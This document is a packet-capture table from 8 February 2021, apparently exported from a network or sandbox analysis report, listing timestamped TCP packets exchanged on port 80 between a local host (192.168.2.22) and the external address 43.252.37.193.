                                                                              Feb 8, 2021 10:28:20.289412975 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289479971 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.291296005 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.291362047 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.291384935 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.493985891 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.494045973 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.494096994 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.494143963 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.494282007 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.494333029 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.494725943 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.495641947 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.495704889 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.495778084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.495827913 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.698791027 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.698843956 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.698882103 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.698921919 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.698961020 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.699079037 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.699143887 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.699156046 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.699162006 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.699166059 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.700084925 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.700129032 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.700217009 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.700237036 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.903728962 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.903775930 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.903822899 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.904043913 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.904613018 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.904655933 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.904704094 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.904728889 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.108608007 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.108659029 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.108696938 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.108746052 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.108922005 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.108974934 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.109050989 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.109093904 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.109133959 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.109160900 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.313561916 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.313628912 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.313673019 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.313710928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.313749075 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.313950062 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.316771984 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.316790104 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.518392086 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.518438101 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.518488884 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.518640995 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.518693924 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.518701077 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.520978928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.521015882 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.521148920 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.521198988 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.724520922 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.725131035 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.727204084 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.727282047 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.727391958 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.727416039 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.929595947 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.929699898 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.931683064 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.931735992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.931777954 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:21.931794882 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.931819916 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:21.931829929 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.134295940 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.134593010 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.136394978 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.136437893 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.136475086 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.136518955 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.136522055 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.136544943 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.136581898 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.341140032 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341202974 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341252089 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341295004 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341334105 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341372967 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.341535091 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.344937086 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.546144009 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.546219110 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.546255112 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.546266079 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.546302080 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.546308041 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.546308994 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.546367884 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.549482107 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.549532890 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.549578905 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.549612045 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.753197908 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.753249884 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.753290892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.753329992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.753448009 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.756341934 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.756392956 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.756444931 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.756483078 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.756489038 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.756597996 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.756663084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.959336996 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.959383965 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.959649086 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.961519957 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.961570978 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.961622000 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.961657047 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.961746931 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.961786985 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:22.961827993 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:22.961855888 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.164124012 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.164191961 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.164310932 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.164340973 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.166009903 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.166063070 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.166095018 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.166134119 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.166167021 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.166217089 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.166234016 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.166280031 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.368864059 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.368926048 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.369175911 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.370393038 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.370448112 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.370522022 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.370553970 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.370573044 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.370623112 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.370652914 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.370682001 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.573863029 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.573914051 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.574086905 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.574798107 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.574850082 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.574898005 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.574918985 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.575021982 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.575063944 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.575102091 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.575119972 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.781049967 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.781099081 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.781137943 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.781177998 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.781357050 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.781411886 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.781764984 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.781873941 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.782016993 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.782067060 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.782109976 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.782135963 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.988363981 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988420010 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988460064 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988498926 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988548040 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988641977 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.988653898 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988677979 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.988697052 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:23.988718033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:23.988749981 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193187952 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193244934 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193284988 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193288088 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193320990 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193325043 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193366051 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193367958 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193383932 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193420887 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193430901 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193470001 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.193495989 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.193546057 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.397840977 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.397869110 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.397881031 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.397893906 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.397953033 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.397998095 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.398226023 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.398283005 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.401088953 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.602725029 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.603085041 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.605293036 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605314970 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605329990 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605346918 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605362892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605379105 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.605511904 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.605555058 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.807559967 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.807676077 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.810086012 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.810110092 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.810184956 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.810209990 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.813328981 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.813366890 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.813414097 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.813431978 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:24.813469887 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.813519001 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.813532114 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:24.813538074 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.014410973 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.014437914 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.014455080 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.014722109 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.014772892 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.014780998 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.017709970 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.017925978 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.018007994 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.018057108 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.223056078 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.223078966 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.223090887 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.223345041 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.224514008 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.224535942 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.224682093 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.427731991 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.427767992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.427793026 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.427814960 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.427891016 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.428756952 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.428793907 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.428818941 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.428845882 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.428852081 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.633944035 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.634222031 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.634990931 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.635020018 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.635087013 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.635104895 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.839170933 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.839201927 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.839224100 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.839339018 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:25.839400053 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.839461088 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.839466095 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:25.839468002 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.043896914 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.043920040 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.043931961 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.043942928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.044162035 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.045250893 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.045269012 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.248832941 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.249152899 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.249656916 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.249687910 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.249703884 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.249754906 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.249783993 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.253278017 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.454406977 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.454457045 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.454518080 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.454557896 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.454611063 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.454623938 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.459018946 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.459116936 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.655468941 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.655745029 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.660315037 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.660345078 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.660535097 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.861362934 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.861687899 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:26.866123915 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.866169930 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:26.866476059 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.066237926 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.066284895 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.066346884 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.067332029 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.070943117 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.071000099 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.071043015 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.071072102 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.271508932 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.271629095 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.271832943 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.271888971 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.275696039 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.275768995 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.275871992 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.275918007 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.476301908 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.476356983 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.476578951 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.480185986 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.480230093 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.480408907 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.681521893 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.681792021 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.681874990 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.681967974 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.684945107 CET804916743.252.37.193192.168.2.22
